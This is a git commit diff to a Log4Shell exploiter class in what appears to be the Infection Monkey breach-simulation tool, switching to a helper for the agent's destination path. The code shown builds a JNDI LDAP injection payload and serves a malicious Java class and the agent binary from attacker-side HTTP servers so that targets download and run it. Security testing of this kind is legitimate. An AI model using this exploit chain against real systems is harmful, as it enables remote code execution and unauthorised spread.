Agent: Use random agent name in log4shell exploiter

This commit is contained in:
vakaris_zilius 2022-03-24 10:37:57 +00:00
parent dc2a63475b
commit 90b4038c14
1 changed files with 6 additions and 4 deletions

View File

@ -1,5 +1,6 @@
import logging import logging
import time import time
from pathlib import Path
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
from infection_monkey.exploit.log4shell_utils import ( from infection_monkey.exploit.log4shell_utils import (
@ -10,6 +11,7 @@ from infection_monkey.exploit.log4shell_utils import (
build_exploit_bytecode, build_exploit_bytecode,
get_log4shell_service_exploiters, get_log4shell_service_exploiters,
) )
from infection_monkey.exploit.tools.helpers import get_agent_dest_path
from infection_monkey.exploit.tools.http_tools import HTTPTools from infection_monkey.exploit.tools.http_tools import HTTPTools
from infection_monkey.exploit.web_rce import WebRCE from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.i_puppet.i_puppet import ExploiterResultData from infection_monkey.i_puppet.i_puppet import ExploiterResultData
@ -60,13 +62,13 @@ class Log4ShellExploiter(WebRCE):
self._agent_http_server_thread = None self._agent_http_server_thread = None
def _start_servers(self): def _start_servers(self):
dropper_target_path = self.monkey_target_paths[self.host.os["type"]] target_path = get_agent_dest_path(self.host, self.options)
# Start http server, to serve agent to victims # Start http server, to serve agent to victims
agent_http_path = self._start_agent_http_server(dropper_target_path) agent_http_path = self._start_agent_http_server(target_path)
# Build agent execution command # Build agent execution command
command = self._build_command(dropper_target_path, agent_http_path) command = self._build_command(target_path, agent_http_path)
# Start http server to serve malicious java class to victim # Start http server to serve malicious java class to victim
self._start_class_http_server(command) self._start_class_http_server(command)
@ -111,7 +113,7 @@ class Log4ShellExploiter(WebRCE):
interface_ip = get_interface_to_target(self.host.ip_addr) interface_ip = get_interface_to_target(self.host.ip_addr)
return f"${{jndi:ldap://{interface_ip}:{self._ldap_port}/dn=Exploit}}" return f"${{jndi:ldap://{interface_ip}:{self._ldap_port}/dn=Exploit}}"
def _build_command(self, path, http_path) -> str: def _build_command(self, path: Path, http_path) -> str:
# Build command to execute # Build command to execute
monkey_cmd = build_monkey_commandline(self.host, self.current_depth - 1, location=path) monkey_cmd = build_monkey_commandline(self.host, self.current_depth - 1, location=path)
if "linux" in self.host.os["type"]: if "linux" in self.host.os["type"]: